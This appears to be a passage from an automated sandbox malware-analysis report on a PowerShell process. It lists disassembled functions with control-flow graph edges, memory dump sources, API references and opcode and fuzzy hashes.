                      • Opcode Fuzzy Hash: 0b5ccb24f21d544aa1b862cd0d1d46601a7da1f1ea64ebd5962f9034137c0161
                      • Instruction Fuzzy Hash: 3AA1DF34B002148FCB64DF78D8446AEB7E7EF88310F158569E506AB394DF79EC058B96
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 042B6F24 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1098 42b6f24-42b6f30 1099 42b6ee2-42b6efd GetFileAttributesW 1098->1099 1100 42b6f32-42b6fb4 1098->1100 1101 42b6eff-42b6f05 1099->1101 1102 42b6f06-42b6f23 1099->1102 1101->1102
                      APIs
                      • GetFileAttributesW.KERNELBASE(00000000), ref: 042B6EF0
                      Memory Dump Source
                      • Source File: 00000001.00000002.388104727.00000000042B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_42b0000_powershell.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: b3b6c6f1ef2ca3f22b0e2e19fd70e8441a1576970eec4c4afa5d4f4496b95241
                      • Instruction ID: 2f1e0f7ec4268c93047b7ec8daea04dc0fc1ded481c30738820dc0903b60ae57
                      • Opcode Fuzzy Hash: b3b6c6f1ef2ca3f22b0e2e19fd70e8441a1576970eec4c4afa5d4f4496b95241
                      • Instruction Fuzzy Hash: 33F0F072E182A48FDB119FEDD8083D9FBB0FB19394F09859AD095E7250C3B8A504CBD2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721C90 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1106 721c90-721ca5 1108 721cab-721cc0 1106->1108 1109 721d4f-721d7c 1106->1109 1112 721cc2-721cc8 1108->1112 1113 721cc9-721cda 1108->1113 1119 721d7e-721d7f 1109->1119 1120 721dfd-721e10 1109->1120 1117 721ce3-721cec 1113->1117 1118 721cdc-721ce1 1113->1118 1121 721cef-721cf3 1117->1121 1118->1121 1133 721e12 call 721c90 1120->1133 1134 721e12 call 721c80 1120->1134 1123 721cf5-721d33 1121->1123 1124 721d3b-721d41 1121->1124 1123->1124 1126 721d48-721d4e 1124->1126 1128 721e18-721e1b 1133->1128 1134->1128
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: `o-k
                      • API String ID: 0-2745386557
                      • Opcode ID: 9521bb5c21b46b18f15d0dddc078d551db57eaa0f6913364fc8b86295f193870
                      • Instruction ID: 3403a2b0457242a924930ebf7945182ac2dba1be5df3440960f7afe6b133205d
                      • Opcode Fuzzy Hash: 9521bb5c21b46b18f15d0dddc078d551db57eaa0f6913364fc8b86295f193870
                      • Instruction Fuzzy Hash: 98210630A046148FC705EB74D8542AEB7B2FFC2351F41897AD14A8B291EF349D06CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00724F80 Relevance: .4, Instructions: 431COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1479 724f80-724fb5 1481 724fb7-724fc1 1479->1481 1482 724fd5-72503b 1479->1482 1481->1482 1485 724fc3-724fcf 1481->1485 1492 725041-72504b 1482->1492 1493 725109-72510d 1482->1493 1485->1482 1488 725f6d-725f84 1485->1488 1510 725f8b-725f98 1488->1510 1500 725058-725063 1492->1500 1501 72504d-725056 1492->1501 1494 725122-725128 1493->1494 1495 72510f-725119 1493->1495 1498 7252b1-7252b5 1494->1498 1499 72512e-725139 1494->1499 1495->1494 1509 72511b 1495->1509 1502 7252bb-7252bf 1498->1502 1503 7253f9-725409 1498->1503 1499->1498 1512 72513f-72514b 1499->1512 1506 725069-725073 1500->1506 1501->1506 1507 7253b2-7253c5 1502->1507 1508 7252c5-7252f8 1502->1508 1521 72540b-725447 1503->1521 1522 725449-725471 1503->1522 1527 7250a1-7250a5 1506->1527 1528 725075-72509e 1506->1528 1514 7253c7-7253d2 1507->1514 1515 7253d5-7253e5 call 726063 1507->1515 1537 7252fa-7252fe 1508->1537 1538 725328-725341 1508->1538 1509->1494 1524 725f99-725fa0 1510->1524 1517 725175-72517c 1512->1517 1518 72514d-725168 1512->1518 1514->1515 1525 7253eb-7253f6 1515->1525 1517->1498 1526 725182-725193 1517->1526 1518->1517 1550 725477-7254b9 1521->1550 1522->1550 1524->1524 1529 725fa2-725fbf 1524->1529 1525->1503 1543 725195-7251a6 1526->1543 1544 7251a8-7251ab 1526->1544 1539 7250a7-7250ae 1527->1539 1540 7250ef-725104 1527->1540 1528->1527 1537->1510 1545 725304-725313 1537->1545 1565 725343-725357 1538->1565 1566 725359-72535c 1538->1566 1546 7250b0-7250c1 1539->1546 1547 7250dc-7250e7 1539->1547 1540->1503 1553 7251b1-7251c3 1543->1553 1544->1553 1546->1547 1560 7250c3-7250da 1546->1560 1547->1540 1573 7254d3-7254eb 1550->1573 1574 7254bb-7254cd 1550->1574 1557 7251c5-7251d5 1553->1557 1558 7251dd-7251e3 1553->1558 1557->1558 1561 7251e5-7251f4 1558->1561 1562 7251fc-72521f 1558->1562 1560->1540 1561->1562 1585 725221-725257 1562->1585 1586 725284-725297 1562->1586 1569 725362-725369 1565->1569 1566->1569 1575 72539a-7253b0 1569->1575 1576 72536b-72537c 1569->1576 1582 7254ff-72554f 1573->1582 1583 7254ed-7254f3 1573->1583 1574->1573 1575->1503 1576->1575 1581 72537e-725392 call 72c2d7 1576->1581 1587 725398 1581->1587 1604 725551-725575 1582->1604 1605 725577-725593 1582->1605 1583->1582 1600 725274-725282 1585->1600 1601 725259-725272 1585->1601 1589 725299-7252a0 1586->1589 1587->1503 1591 7252a2 1589->1591 1592 7252ae 1589->1592 1591->1592 1592->1498 1600->1585 1600->1586 1601->1589 1604->1605 1607 7255a1 1605->1607 1608 725595 1605->1608 1610 7255a2 1607->1610 1608->1607 1610->1610
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dec9851376fad8b9bea063c6efb5fb9367e575c6c630440b76953913f237c987
                      • Instruction ID: 3082760238fbbb1f59e12a2d66800c82a0ac57261285d0d7fcc9560deb41dfce
                      • Opcode Fuzzy Hash: dec9851376fad8b9bea063c6efb5fb9367e575c6c630440b76953913f237c987
                      • Instruction Fuzzy Hash: 45120A74A01228DFDB64DF64DC94BADBBB2BF48345F1081A9E909A73A0DB349D84CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00720810 Relevance: .2, Instructions: 238COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14b39731859962b333d5cb5b079c7e22decd5dede2bf219acde7f7c8b83ded99
                      • Instruction ID: a020e9933ae4e751ef91df8761f369ea821244c9e0a3a54e87a8405540314de2
                      • Opcode Fuzzy Hash: 14b39731859962b333d5cb5b079c7e22decd5dede2bf219acde7f7c8b83ded99
                      • Instruction Fuzzy Hash: 7E915930A00618DFCB24DF69E544B9EB7F2FF88314F14856AD44AAB652D778AC45CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00726A43 Relevance: .2, Instructions: 231COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42e09cb00ef383312e395fd8bbe2de232115d9a0ecf1057bd6272273127414ef
                      • Instruction ID: 4fa119f23da01c01023c6bd4e54586715bcd551c47782e105b39a4127f7ad46c
                      • Opcode Fuzzy Hash: 42e09cb00ef383312e395fd8bbe2de232115d9a0ecf1057bd6272273127414ef
                      • Instruction Fuzzy Hash: 3A915B306002199FCB54DF69E894AAEBBF2FF84304F158929E442DB3A1DB74ED45CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00725B09 Relevance: .2, Instructions: 229COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3aa6d7855e9f5386fc6ce650919677a68d401fb38f4fa1162bba489e5051f494
                      • Instruction ID: 54946a9a164aef6de0509d7dd77d92464aa20e10138684ffdea01645a772870c
                      • Opcode Fuzzy Hash: 3aa6d7855e9f5386fc6ce650919677a68d401fb38f4fa1162bba489e5051f494
                      • Instruction Fuzzy Hash: C7B11A74A04268CFDB64DF24D898BAD77B6BF48301F1585A9E40AAB3A0DB34DD85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 007219B0 Relevance: .2, Instructions: 216COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d82c31dc3ff669dfcb7d8206a82352d969e0d245b0fbce9a0adf2bb8b66de57b
                      • Instruction ID: 5f4483090960bbf6ebf50087584ab7cc50c99b1c3dc7602bf28255c25453f97c
                      • Opcode Fuzzy Hash: d82c31dc3ff669dfcb7d8206a82352d969e0d245b0fbce9a0adf2bb8b66de57b
                      • Instruction Fuzzy Hash: 17816934B152088FDB04DB68D894AAEB7F2FF89315F1480A9E506EB3A1DB35AD41CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00726063 Relevance: .2, Instructions: 209COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b840ad398bf3497dbb45b243ec0c1fddd16a83c7426876cac94c8d18f7481e7
                      • Instruction ID: 128e59b1948ac593ab220568658264aaf4b371cb727517c78e4fe9fe04bc3ae4
                      • Opcode Fuzzy Hash: 5b840ad398bf3497dbb45b243ec0c1fddd16a83c7426876cac94c8d18f7481e7
                      • Instruction Fuzzy Hash: C0816634B102149FCB04DB68D484A9DBBF2FF89314F1585AAE905AB3A2DB75ED05CF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00724F70 Relevance: .2, Instructions: 204COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd962df19af200616255746822a6bf5dfda7be33e09a8214074d71f7f98d17b6
                      • Instruction ID: 94526a413d1344c7d2f51e770d338f68f17b5303e004a23a665b29916e084091
                      • Opcode Fuzzy Hash: cd962df19af200616255746822a6bf5dfda7be33e09a8214074d71f7f98d17b6
                      • Instruction Fuzzy Hash: 22910A74A00229DFDB64DF25DC94BADBBB2BF48345F1481A9E909A7390DB34AD84CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721D80 Relevance: .2, Instructions: 168COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b792a6d625310d69a6eff5c72b5f798df620638009a80636bb6c4f28a3616f7
                      • Instruction ID: 47259e5c5e5dc78abafc58243536d86000d00a6fa7f6d29e12e62783c5af9e6d
                      • Opcode Fuzzy Hash: 0b792a6d625310d69a6eff5c72b5f798df620638009a80636bb6c4f28a3616f7
                      • Instruction Fuzzy Hash: DC5147357082109FC71A9B39A8183BE3BE6EF85315B5909BBE50AC7382DF395C068791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072982F Relevance: .1, Instructions: 138COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d88e25d1745d7248048019b9fd6acefb2589e363d73d5f566dc77b91ceebe918
                      • Instruction ID: f3a1a758ba3df975e47de4d2388e29f5ad86a988c53d1b603f59de7f9bde7c9a
                      • Opcode Fuzzy Hash: d88e25d1745d7248048019b9fd6acefb2589e363d73d5f566dc77b91ceebe918
                      • Instruction Fuzzy Hash: CE51ABB4A00204DFCB58EB78D845B5E7BF6EF8A302F64806DE105AB390DB369D05CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00729F48 Relevance: .1, Instructions: 130COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4813b869599e513dd0772d22c40a8dca2bd11e2be994c78aec215832a1259c48
                      • Instruction ID: c9a3e86135f5d905d171545dd326c6781463aa3df997f757f25a3fc358cb43f1
                      • Opcode Fuzzy Hash: 4813b869599e513dd0772d22c40a8dca2bd11e2be994c78aec215832a1259c48
                      • Instruction Fuzzy Hash: 12319E2120E3D05FC713AB68A8A48D67F71DF472A470E40D7D4C2CF1A3E6199C0AC3A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00729840 Relevance: .1, Instructions: 129COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04cb95ddb15ebceb93b4be7fb96e034afb22cf4432b17eab78d6134b19410bac
                      • Instruction ID: aad9c4a3cf8cf5d23ac61bab0a29cc76ff548d451206403c89f87708c2080826
                      • Opcode Fuzzy Hash: 04cb95ddb15ebceb93b4be7fb96e034afb22cf4432b17eab78d6134b19410bac
                      • Instruction Fuzzy Hash: 58418B74A01204DFCB48EB78D845B5E7BF6EF8A302F64846DE105AB390DB369D05CB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093F354 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 770f425bbb4b6586041c10fdb815b3708e697c8546b4c238b93a9c495f5fb62a
                      • Instruction ID: 3ee919c9775c352d4ee652c0d9c6a9f51d41136d2818fec832f791764716c9d8
                      • Opcode Fuzzy Hash: 770f425bbb4b6586041c10fdb815b3708e697c8546b4c238b93a9c495f5fb62a
                      • Instruction Fuzzy Hash: A421E271904200EFCF05CF50D9D8B26BB66FB88318F24C9B9E9054A256C33AD85ACF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072A068 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 51aa461ca64d07b04bf13f5ddeb1c94edee50494f6e6216dedae288a2e5f773f
                      • Instruction ID: 9f0ab7ab9e56c1cdebe8f81b1da2994a467aac9a97920901fbab8e955facbd30
                      • Opcode Fuzzy Hash: 51aa461ca64d07b04bf13f5ddeb1c94edee50494f6e6216dedae288a2e5f773f
                      • Instruction Fuzzy Hash: EA212735704128AF8B289B79E8549AEB7F7EFD5350B15C02AE508D7344EB34DC058BE2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093EFA8 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ac8f945872da32b69348b5b19e0c1b94e44f1839bdd85378d567612d2832c472
                      • Instruction ID: 501ee24144dfe8da0627447453fc77f230863036f5ede45abe226c0086e26e6d
                      • Opcode Fuzzy Hash: ac8f945872da32b69348b5b19e0c1b94e44f1839bdd85378d567612d2832c472
                      • Instruction Fuzzy Hash: C02125B0908240DFDB04CF14D4D4B26BB65FB84318F20C9B9D9494B297C37AD846CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072FDF0 Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f74b88cfc695d16ff6f797c7d76c6429be5044310d53cb7a8f9c61447a74c39b
                      • Instruction ID: 274a2c6fe9bb5b54cdc92a6b12d4af97f112e5525e54ba7024e167b9c53855ca
                      • Opcode Fuzzy Hash: f74b88cfc695d16ff6f797c7d76c6429be5044310d53cb7a8f9c61447a74c39b
                      • Instruction Fuzzy Hash: 14216A71E00229CBDF19DFA4E8187EDBBB1EB48315F15003DD402B72A1CBB94940DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00721E20 Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c9e08e92ed8b88f818e813bdf19f3c35e53c95edb180bc27efdb93863da9fb29
                      • Instruction ID: c774baf85045af331921efc90d354e68cc0d87c3cdaf59f5b1acb850d5138acb
                      • Opcode Fuzzy Hash: c9e08e92ed8b88f818e813bdf19f3c35e53c95edb180bc27efdb93863da9fb29
                      • Instruction Fuzzy Hash: 101129353042105FC7155B39B9187AE7BEAFF89316B4108AEE41ACB681DF399D06C7A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093F34F Relevance: .1, Instructions: 57COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7373f3b095079c8085fc5391b305a90cc324b305bea087d039aac7e035de49d1
                      • Instruction ID: f519546da8986d1ad4fdd7d8e0299aa8f681535bdb7bd24388c03e06de8c2527
                      • Opcode Fuzzy Hash: 7373f3b095079c8085fc5391b305a90cc324b305bea087d039aac7e035de49d1
                      • Instruction Fuzzy Hash: 6F216A76904240DFCB06CF50D9D8B16BF62FB88314F24C6A9D9094A266C33AD86ACF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00720E90 Relevance: .1, Instructions: 56COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c533bc0654809387b6e00442933ee7f947bc410a8e87e02bbe5c14ef69eb7e82
                      • Instruction ID: 2e00329a426ce175a38ed3f54b3e32529931394c4a92924fc50daf0048109a44
                      • Opcode Fuzzy Hash: c533bc0654809387b6e00442933ee7f947bc410a8e87e02bbe5c14ef69eb7e82
                      • Instruction Fuzzy Hash: DA118E75A10514CFC714AF68D494ADDBBB1EF8C311F108059D505AB3A1CB716C41CFE4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072FDDD Relevance: .1, Instructions: 56COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eb6393cad0b0a1616fffe9b7c78633d75f70a42440226cf11406f26835b6dbdc
                      • Instruction ID: 5478e681d336a01c3589deb5d88b63f16f83caab3b48e7eea244856ac3218689
                      • Opcode Fuzzy Hash: eb6393cad0b0a1616fffe9b7c78633d75f70a42440226cf11406f26835b6dbdc
                      • Instruction Fuzzy Hash: D7110231A042558BDB1A8BA4E8283EEBFB1AF49320F18047ED401B76A1CB794D40DB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072A058 Relevance: .1, Instructions: 55COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cbf741fdf7ca0af167c12f31edd912f70578a92f05dc68720ea179693120aa1a
                      • Instruction ID: a9576c12366b37b41b1bad04fc2a0cbf3fa46473b459c3a8a6c3470a23d59cb6
                      • Opcode Fuzzy Hash: cbf741fdf7ca0af167c12f31edd912f70578a92f05dc68720ea179693120aa1a
                      • Instruction Fuzzy Hash: A011E571B00115AFCB24CF69D8409EFBBB7EFA5390B14812AE814D7251E7359D05CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093EFA3 Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8d995bed1e56ecd4f83b4dd5f006ecb01a09a897dda4f968aa4054b4fb86a75
                      • Instruction ID: 522ee47d3e4ae1676735b99c7c4ecf8c6e750a0a0fbee698989e24bc85cb9617
                      • Opcode Fuzzy Hash: a8d995bed1e56ecd4f83b4dd5f006ecb01a09a897dda4f968aa4054b4fb86a75
                      • Instruction Fuzzy Hash: 4C119D75908280DFCB15CF14D5D4B25BFA2FB84314F28C6AAD8494B697C33AD85ACF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00720EA0 Relevance: .0, Instructions: 49COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4244070acb7c6d8bc45cae4008508c0f21b6af33f934e066acd8f3fd4648f2f0
                      • Instruction ID: d586409bbec8e5b80a687c89f635642f7b21b317bf75fa5fb7329f16a4ab6946
                      • Opcode Fuzzy Hash: 4244070acb7c6d8bc45cae4008508c0f21b6af33f934e066acd8f3fd4648f2f0
                      • Instruction Fuzzy Hash: 57115A71A50114DFCB14DF68D498A9EBBB6EF88311F148069E906AB3A1CB75AC04CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072BDE8 Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 85282da57b83c6f7551d4cfbeb6b202d18cf21f05806cbc496e5128bcb76d3a5
                      • Instruction ID: 5d0434fd7fb8c7f31153ea0be904473900969fab5c4766d5964341ee59e2dcd1
                      • Opcode Fuzzy Hash: 85282da57b83c6f7551d4cfbeb6b202d18cf21f05806cbc496e5128bcb76d3a5
                      • Instruction Fuzzy Hash: BDF02232208319ABDF11CDA0AC00DFB3B69EB85320F058096FA44D6121C72ACD21EBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D01D Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0f44a53ea4536931a2bf3b94eef54485e7e095449fd17372b5b10b088f8a588
                      • Instruction ID: f67d98143aedcfd104f9361b793e1709dd2520538ddac1ea7297c02a8dbefbb7
                      • Opcode Fuzzy Hash: f0f44a53ea4536931a2bf3b94eef54485e7e095449fd17372b5b10b088f8a588
                      • Instruction Fuzzy Hash: 93017B704093809AD7144E25EC84B67FFDCEF41B24F088809ED045B282C3789D05CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D006 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 864cc0974f5c6e56efc674e9a2b23743ecf52aa9516bf6b8e6b190469be78cd3
                      • Instruction ID: 29a207820cf6516b396cf4ec882de8c30582055cb630be0f71cfbd9f75fe3fdc
                      • Opcode Fuzzy Hash: 864cc0974f5c6e56efc674e9a2b23743ecf52aa9516bf6b8e6b190469be78cd3
                      • Instruction Fuzzy Hash: 2B01296140E3C05ED7168B259CA4B52BFB8AF53624F0D81DBD9848F2A3C2699849CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00724D50 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ae2d9e0f988222cc77181306fddbcce15c709db79eb79ad13171cf7ddaf8aa6
                      • Instruction ID: 2c9916b2e9adb7582c3f65303710f207ed4f5a87bf79ec4a61fe5b9f37e926e2
                      • Opcode Fuzzy Hash: 2ae2d9e0f988222cc77181306fddbcce15c709db79eb79ad13171cf7ddaf8aa6
                      • Instruction Fuzzy Hash: 22F0F632318034DBCB295A39B84427E31869FC9791F858436F706C7340E92DC94296D6
                      Uniqueness

                      Uniqueness Score: -1.00%

